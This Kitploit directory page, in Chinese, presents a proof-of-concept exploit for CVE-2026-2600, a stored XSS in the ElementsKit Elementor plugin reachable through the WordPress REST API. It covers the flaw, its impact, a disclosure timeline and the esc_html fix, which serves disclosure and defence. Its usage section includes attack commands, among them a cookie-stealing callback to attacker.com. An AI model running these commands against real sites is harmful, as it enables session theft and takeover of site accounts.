Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-2600-POC — 针对 CVE-2026-2600 的概念验证漏洞利用程序,该漏洞是 ElementsKit Elementor 插件(版本 <= 3.7.9)中的存储型 XSS 漏洞,允许已认证的贡献者通过精心构造的 Elementor 数据注入任意脚本。 | Kitploit
工具/GitHubGitHub/folks-iwd/cve-2026-2600-poc
漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试
GitHubfolks-iwd/cve-2026-2600-poc

CVE-2026-2600-POC

针对 CVE-2026-2600 的概念验证漏洞利用程序,该漏洞是 ElementsKit Elementor 插件(版本 <= 3.7.9)中的存储型 XSS 漏洞,允许已认证的贡献者通过精心构造的 Elementor 数据注入任意脚本。

查看仓库
14个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-2600

ElementsKit Elementor 插件 <= 3.7.9 — 已认证(贡献者+)存储型跨站脚本

CVSS6.4 中危
受影响版本<= 3.7.9
已修复版本3.8.0
最低角色贡献者(edit_posts)
攻击向量网络 / 低复杂度 / 低权限

漏洞详情

Simple Tab 组件在渲染标签标题时直接使用 echo 输出 HTML,但未进行输出转义。在 widgets/tab/tab.php 中,渲染循环执行以下操作:

root@kitploit:~
foreach ( $settings['ekit_tab_items'] as $index => $item ) {
    echo '<a ...>' . $item['ekit_tab_title'] . '</a>';
}

Elementor 编辑器会在客户端对输入进行清理,但 REST API 端点(/wp-json/wp/v2/posts/{id})会直接接受 _elementor_data 元字段,完全绕过了这一层防护。

已认证的贡献者可以通过 PATCH 请求修改文章,注入精心构造的 Elementor JSON 载荷,将 ekit_tab_title 设置为任意 HTML。由于该值会原样存储在 _elementor_data 中,并在渲染时未经 esc_html() 转义直接输出,因此当页面加载时,脚本会在每位访问者的浏览器中执行。

影响

任何贡献者都可以:

  • 窃取所有网站访客(包括管理员)的会话 Cookie 和身份验证令牌
  • 劫持管理员账户并升级为完全接管网站
  • 静默部署键盘记录器或凭证窃取覆盖层
  • 将访客重定向到钓鱼页面或恶意软件分发网站
  • 持久篡改页面 — 载荷会一直存在,直到被手动清除

披露时,受影响的活动安装量超过 40 万。

使用方法

root@kitploit:~
pip install requests
python3 poc.py https://target.com contributor p4ss

该脚本通过 HTTP 进行身份验证,从管理编辑器获取 REST nonce,创建草稿文章,将包含 XSS 载荷的 _elementor_data 通过 ekit_tab_title 字段进行 PATCH 修改,然后发布文章。输出结果会确认载荷是否已生效于页面源代码中。

root@kitploit:~
# 自定义载荷
python3 poc.py https://target.com contributor p4ss --payload '<script>alert(document.domain)</script>'

# 带回调的 Cookie 窃取
python3 poc.py https://target.com contributor p4ss --type cookie --callback https://attacker.com/steal

# 交互式控制台模式
python3 console_poc.py

完整技术分析

https://folks-iwd.github.io/writeups/cve-2026-2600.html

披露时间线

日期事件
2026 年 1 月通过 SVN 差异审查发现漏洞。PoC 已确认。
2026 年 1 月向 Patchstack Alliance 提交完整技术分析和 PoC。
2026 年 3 月Wpmet 在 v3.8.0 版本中发布了修复。
2026 年 4 月CVE-2026-2600 发布。分配 CVSS 6.4 中危评级。

修复方案

Wpmet 在 widgets/tab/tab.php 中对标签标题输出添加了 esc_html():

root@kitploit:~
- echo '<a ...>' . $item['ekit_tab_title'] . '</a>';
+ echo '<a ...>' . esc_html( $item['ekit_tab_title'] ) . '</a>';
下载工具